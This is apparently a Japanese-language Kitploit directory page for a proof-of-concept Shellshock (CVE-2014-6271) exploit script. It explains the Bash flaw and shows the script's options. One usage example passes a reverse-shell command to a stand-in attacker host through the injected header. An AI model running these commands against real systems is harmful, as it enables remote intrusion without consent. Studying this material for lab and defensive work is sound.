Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-6271-Shellshock — CVE-2014-6271 エクスプロイト | 作者: infrar3d | Kitploit
ツール/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

CVE-2014-6271 エクスプロイト | 作者: infrar3d

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
5ヶ月前未レビュー

CVE-2014-6271 Shellshock

infrar3d によるエクスプロイト

このリポジトリには、CVE-2014-6271 (Shellshock) の概念実証エクスプロイトが含まれています。

Shellshock は GNU Bash における深刻な脆弱性で、特別に細工された環境変数によって任意のコマンド実行が可能になります。
Web サーバーが Bash を呼び出す CGI スクリプトに HTTP ヘッダーを渡す場合、攻撃者はそのヘッダーを介してコマンドを注入できます。

使用方法:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

例:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(VulnHub のマシン「Hacksudo - Thor」でテスト済み)

⚠️ 免責事項 ⚠️

このソフトウェアおよび概念実証コードは、教育および研究目的のみで提供されています。

  • 作者は、このプログラムによって引き起こされた誤用や損害について一切責任を負いません。
  • 明示的な事前許可なしに、いかなるシステムに対しても使用しないでください。
  • 同意なしにターゲットを攻撃するためのこのツールの使用は違法です。

適用されるすべての法律を遵守する責任はあなたにあります。倫理的かつ責任を持って使用してください。

ツールをダウンロード